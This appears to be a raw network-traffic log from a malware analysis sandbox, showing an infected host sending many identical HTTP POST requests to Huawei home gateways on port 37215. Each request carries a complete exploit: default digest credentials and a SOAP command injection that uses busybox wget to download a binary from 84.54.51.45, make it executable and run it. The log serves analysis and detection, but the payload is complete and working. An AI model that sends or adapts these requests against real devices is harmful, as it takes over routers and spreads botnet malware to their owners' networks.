                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            863192.168.2.155356241.216.162.14537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.742127895 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            864192.168.2.155020841.40.6.17937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.742152929 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            865192.168.2.153511641.91.9.22037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.742235899 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            866192.168.2.155104241.151.136.2737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.742285013 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            867192.168.2.154344441.225.206.16237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.742310047 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            868192.168.2.153661641.215.145.1237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.742355108 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            869192.168.2.155687641.240.24.12337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.742355108 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            870192.168.2.153843041.222.197.13437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.742355108 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            871192.168.2.153618841.192.60.3637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.742355108 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            872192.168.2.155288641.97.114.8337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.742422104 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
